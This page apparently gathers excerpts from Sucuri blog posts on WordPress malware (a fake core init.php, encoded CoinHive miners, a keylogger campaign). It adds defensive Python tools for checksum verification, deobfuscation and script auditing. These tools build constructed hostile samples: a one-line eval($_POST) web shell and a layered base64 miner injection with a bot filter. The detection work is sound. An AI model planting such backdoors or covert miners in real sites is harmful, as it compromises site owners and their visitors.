Categories
Security

Obfuscation Through Legitimate Appearances

Recently, I analyzed a malware sample provided by our analyst Edward C. Woelke and noticed that it had been placed in a core WordPress folder. This seemed suspicious, since WordPress core ships no file by that name: ./wp-includes/init.php
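The check that catches a file like this is a comparison of the core trees against the release manifest: anything under wp-admin/ or wp-includes/ that the manifest does not list has no business being there, and anything it does list must still hash to the published value. The following is an added example for this page, not Sucuri's code. The manifest and the on-disk snapshot are constructed for the demo (the planted init.php, the tampered load.php and the placeholder version string are all invented); in a real check the manifest comes from the MD5 checksums WordPress publishes for the installed version, which is what WP-CLI's `wp core verify-checksums` compares against.

```python
"""Flag files in WordPress core directories that the release manifest does not
list, and core files whose contents no longer match it.

Added example, not Sucuri's code. RELEASE_FILES and ON_DISK are constructed;
a real manifest comes from the MD5 checksums WordPress publishes per version.
"""
import hashlib

# Only these trees are fully described by the release manifest. wp-content/
# holds themes, plugins and uploads that legitimately differ between sites.
CORE_DIRS = ("wp-admin/", "wp-includes/")


def md5_hex(data: bytes) -> str:
    return hashlib.md5(data).hexdigest()


# Constructed stand-in for a pristine release: path -> file contents.
RELEASE_FILES = {
    "index.php": b"<?php define('WP_USE_THEMES', true); require 'wp-blog-header.php';",
    "wp-admin/index.php": b"<?php require_once 'admin.php';",
    "wp-includes/version.php": b"<?php $wp_version = 'x.y.z'; // placeholder",
    "wp-includes/load.php": b"<?php function wp_check_php_mysql_versions() {}",
}
MANIFEST = {path: md5_hex(body) for path, body in RELEASE_FILES.items()}

# Constructed snapshot of a compromised install: one planted file with a
# core-looking name, one tampered core file, and a theme file that is not core.
ON_DISK = dict(RELEASE_FILES)
ON_DISK["wp-includes/init.php"] = b"<?php class Init { /* tidy code, but not a core file */ }"
ON_DISK["wp-includes/load.php"] = RELEASE_FILES["wp-includes/load.php"] + b"\n@eval($_POST['x']);"
ON_DISK["wp-content/themes/demo/header.php"] = b"<?php wp_head(); ?>"


def verify(manifest: dict, on_disk: dict) -> list:
    """Return (kind, path) findings: 'unexpected', 'modified' or 'missing'."""
    findings = []
    for path, body in sorted(on_disk.items()):
        if path in manifest:
            if md5_hex(body) != manifest[path]:
                findings.append(("modified", path))
        elif path.startswith(CORE_DIRS):
            # No legitimate reason for an unlisted file to live under a core tree.
            findings.append(("unexpected", path))
    for path in sorted(set(manifest) - set(on_disk)):
        findings.append(("missing", path))
    return findings


if __name__ == "__main__":
    for kind, path in verify(MANIFEST, ON_DISK):
        print(f"{kind:10s} {path}")
```

Run against the constructed snapshot, the script reports `wp-includes/init.php` as unexpected and `wp-includes/load.php` as modified, and says nothing about the theme file, which is exactly the split an analyst wants: core is verifiable byte for byte, wp-content/ needs a different approach.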

Deceiving Appearances

I started with a standard analysis, and my first thought was that this had to be a legitimate file: nicely structured, with very legitimate-looking function names. It even used object-oriented PHP, which is rare in malware.

Continue reading Obfuscation Through Legitimate Appearances at Sucuri Blog.


Malicious Website Cryptominers from GitHub. Part 2.

Recently we wrote about how GitHub/GitHub.io was used in attacks that injected cryptocurrency miners into compromised websites. Around the same time, we noticed another attack that also used GitHub for serving malicious code.

Encrypted CoinHive Miner in Header.php

The following encrypted malware was found in the header.php file of the active WordPress theme:

There are four lines of code in total. Each, when decoded, plays a different role.

CoinHive Injections

When decoded, the last two lines inject typical CoinHive cryptocurrency miners:

The miner is only shown conditionally, so bots are excluded and only human visitors will receive it.
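The decoding work described above (several encoded lines, the last of which inject a CoinHive miner behind a visitor check) is mechanical once the wrapping functions are known, so it is worth scripting. The block below is an added example, not Sucuri's code and not the sample from the post: it peels `eval(base64_decode(...))` and `gzinflate(...)` layers off a PHP fragment, recurses into whatever comes out, and then looks for two indicators, a CoinHive library load or `CoinHive.Anonymous`/`CoinHive.User` constructor, and a bot/crawler test on `HTTP_USER_AGENT` in the same statement. The header.php fragment it analyses is constructed at the bottom of the block to resemble the described pattern; `SITEKEY_PLACEHOLDER` is a dummy value and the decoder set is limited to the three functions named.

```python
"""Peel eval(base64_decode(...)) / gzinflate(...) layers off a PHP fragment and
look for CoinHive and bot-filter indicators in what comes out.

Added example, not Sucuri's code. SAMPLE_HEADER_PHP is constructed below;
SITEKEY_PLACEHOLDER is a dummy site key.
"""
import base64
import re
import string
import zlib

ROT13 = str.maketrans(
    string.ascii_letters,
    string.ascii_lowercase[13:] + string.ascii_lowercase[:13]
    + string.ascii_uppercase[13:] + string.ascii_uppercase[:13],
)
# PHP decoder name -> bytes equivalent. gzinflate() is raw DEFLATE (wbits=-15).
DECODERS = {
    "base64_decode": base64.b64decode,
    "gzinflate": lambda d: zlib.decompress(d, -15),
    "str_rot13": lambda d: d.decode("latin-1").translate(ROT13).encode("latin-1"),
}
CALL = re.compile(r"^\s*(base64_decode|gzinflate|str_rot13)\s*\((.*)\)\s*$", re.S)
LITERAL = re.compile(r"^\s*(['\"])(.*)\1\s*$", re.S)
MINER_RE = re.compile(r"coinhive\.com/lib/|CoinHive\.(?:Anonymous|User)\s*\(", re.I)
# A bot/crawler test and HTTP_USER_AGENT inside the same statement.
BOT_FILTER_RE = re.compile(
    r"HTTP_USER_AGENT[^;\n]*(?:bot|crawl|spider|slurp)|(?:bot|crawl|spider|slurp)[^;\n]*HTTP_USER_AGENT",
    re.I,
)


def _matching_paren(src: str, open_idx: int) -> int:
    """Index of the ')' closing src[open_idx], skipping over quoted strings."""
    depth, quote, i = 0, None, open_idx
    while i < len(src):
        ch = src[i]
        if quote:
            if ch == "\\":
                i += 1          # skip the escaped character
            elif ch == quote:
                quote = None
        elif ch in "'\"":
            quote = ch
        elif ch == "(":
            depth += 1
        elif ch == ")":
            depth -= 1
            if depth == 0:
                return i
        i += 1
    raise ValueError("unbalanced parentheses")


def unwrap(expr: str):
    """Decode a chain like gzinflate(base64_decode('...')); None if the argument is not a literal."""
    funcs = []
    while True:
        m = CALL.match(expr)
        if not m:
            break
        funcs.append(m.group(1))
        expr = m.group(2)
    lit = LITERAL.match(expr)
    if lit is None:
        return None  # computed argument (concatenation, variables): manual work
    data = lit.group(2).encode("latin-1")
    for name in reversed(funcs):  # innermost decoder runs first
        data = DECODERS[name](data)
    return data.decode("utf-8", "replace")


def decode_evals(src: str, depth: int = 0, max_depth: int = 8) -> list:
    """Plaintext of every eval() payload, recursing into decoded layers."""
    out = []
    if depth >= max_depth:
        return out
    for m in re.finditer(r"\beval\s*\(", src):
        close = _matching_paren(src, m.end() - 1)
        plain = unwrap(src[m.end():close])
        if plain is not None:
            out.append(plain)
            out.extend(decode_evals(plain, depth + 1, max_depth))
    return out


def assess(src: str) -> dict:
    layers = decode_evals(src)
    text = "\n".join([src] + layers)
    return {
        "eval_layers": len(layers),
        "miner": bool(MINER_RE.search(text)),
        "bot_filter": bool(BOT_FILTER_RE.search(text)),
    }


def _raw_deflate(data: bytes) -> bytes:
    """Raw DEFLATE as PHP's gzdeflate() emits it (only used to build the sample)."""
    c = zlib.compressobj(9, zlib.DEFLATED, -15)
    return c.compress(data) + c.flush()


# Constructed sample: the outer layer hides a user-agent check, the inner layer
# hides the miner injection. Not the code from the post.
MINER_JS = ('<script src="https://coinhive.com/lib/coinhive.min.js"></script>'
            '<script>var m = new CoinHive.Anonymous("SITEKEY_PLACEHOLDER"); m.start();</script>')
INNER_PHP = "echo '%s';" % MINER_JS
LAYER1 = base64.b64encode(_raw_deflate(INNER_PHP.encode())).decode()
GUARDED_PHP = ("if (!preg_match('/bot|crawl|spider|slurp/i', $_SERVER['HTTP_USER_AGENT'])) "
               "{ eval(gzinflate(base64_decode('%s'))); }" % LAYER1)
LAYER2 = base64.b64encode(GUARDED_PHP.encode()).decode()
SAMPLE_HEADER_PHP = "<?php eval(base64_decode('%s')); ?>\n<!DOCTYPE html>\n" % LAYER2
```

`assess(SAMPLE_HEADER_PHP)` reports two eval layers with both indicators set, while a clean `<?php get_header(); ?>` reports none. The bot-filter indicator is the one to watch in practice: a fetch from a scanner with a crawler user agent will see a clean page, so the decoded source, not the rendered page, is what has to be inspected.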

Continue reading Malicious Website Cryptominers from GitHub. Part 2. at Sucuri Blog.


Cloudflare[.]Solutions Keylogger on Thousands of Infected WordPress Sites

A few weeks ago, we wrote about a massive WordPress infection that injected an obfuscated script pretending to be jQuery and Google Analytics. In reality, this script loaded a CoinHive cryptocurrency miner from a third-party server.

We also mentioned a post written back in April that described the cloudflare[.]solutions malware, which accompanied the cryptominers. At the moment, PublicWWW reports 5,482 sites infected with this malware. It seems that this evolving campaign is now adding keyloggers to the mix.
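A script that borrows the name of jQuery or Google Analytics but loads from an unrelated host is easy to spot once the page's script sources are listed against the hosts those libraries actually ship from. The block below is an added example for this page, not Sucuri's code: it collects `<script>` tags from HTML, flags library look-alikes served from hosts outside a per-library allowlist, and flags inline scripts carrying common obfuscation markers (`fromCharCode`, `eval(`, long runs of `\x` escapes). The HTML is constructed; `example.invalid` stands in for the attacker host (the post names cloudflare[.]solutions as the real campaign domain), and `EXPECTED_HOSTS` is a site-specific allowlist to be tuned to your own deployment.

```python
"""Flag <script> tags that carry a well-known library's name but load from a
host that library does not ship from, plus inline scripts showing common
obfuscation markers.

Added example, not Sucuri's code. SAMPLE_HTML is constructed; example.invalid
stands in for the attacker-controlled host.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Library name (matched in the URL path) -> hosts it is legitimately served from.
# Tune to your own deployment; these are common CDN/vendor hosts.
EXPECTED_HOSTS = {
    "jquery": {"code.jquery.com", "ajax.googleapis.com", "cdnjs.cloudflare.com"},
    "analytics": {"www.google-analytics.com", "www.googletagmanager.com"},
}
LIBRARY_RE = re.compile(r"jquery|analytics|gtag", re.I)
OBFUSCATION_RE = re.compile(
    r"fromCharCode|\beval\s*\(|unescape\s*\(|(?:\\x[0-9a-f]{2}){8,}", re.I
)


class ScriptCollector(HTMLParser):
    """Gather external script URLs and inline script bodies."""

    def __init__(self):
        super().__init__()
        self.external, self.inline, self._in_inline = [], [], False

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_inline = True

    def handle_data(self, data):
        if self._in_inline:
            self.inline.append(data)

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_inline = False


def audit(html: str, site_host: str) -> list:
    """Return (kind, detail) findings: look-alike library URLs and obfuscated inline code."""
    parser = ScriptCollector()
    parser.feed(html)
    findings = []
    for src in parser.external:
        parts = urlsplit(src)
        host = (parts.hostname or site_host).lower()
        if host == site_host:
            continue  # first-party copy, e.g. /wp-includes/js/jquery/jquery.js
        name = LIBRARY_RE.search(parts.path)
        if not name:
            continue
        key = "jquery" if name.group(0).lower() == "jquery" else "analytics"
        if host not in EXPECTED_HOSTS[key]:
            findings.append(("lookalike_library", src))
    for body in parser.inline:
        if OBFUSCATION_RE.search(body):
            findings.append(("obfuscated_inline", body.strip()[:60]))
    return findings


# Constructed page: two genuine vendor loads, one first-party copy, one look-alike
# from an unexpected host, one obfuscated inline script, one harmless inline script.
SAMPLE_HTML = """<!DOCTYPE html><html><head>
<script src="https://code.jquery.com/jquery-3.2.1.min.js"></script>
<script src="https://www.google-analytics.com/analytics.js"></script>
<script src="/wp-includes/js/jquery/jquery.js"></script>
<script src="https://example.invalid/ajax/libs/jquery.min.js"></script>
<script>var _0x=["\\x63\\x6f\\x69\\x6e\\x68\\x69\\x76\\x65"];eval(String.fromCharCode(118,97,114));</script>
<script>document.body.className += ' js';</script>
</head><body></body></html>"""

if __name__ == "__main__":
    for kind, detail in audit(SAMPLE_HTML, "victim.example"):
        print(f"{kind:20s} {detail}")
```

The look-alike check deliberately ignores first-party paths and anything that does not claim to be a known library; the point is not to enumerate every third-party script but to catch the specific trick of a miner or keylogger loader hiding behind a familiar filename on an unfamiliar host.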

Continue reading Cloudflare[.]Solutions Keylogger on Thousands of Infected WordPress Sites at Sucuri Blog.


Cryptominers on Hacked Sites – Part 2

Last month we wrote about how the emergence of in-browser cryptocurrency miners led hackers to abuse the technology, injecting CoinHive miners into compromised sites without the consent of the website owners.

We reviewed two types of infections that affected WordPress and Magento sites, and have been monitoring the malicious use of the CoinHive cryptominer since. What we are finding is that more and more attacks in the wild use cryptominers, and they affect all major CMS platforms.

Continue reading Cryptominers on Hacked Sites – Part 2 at Sucuri Blog.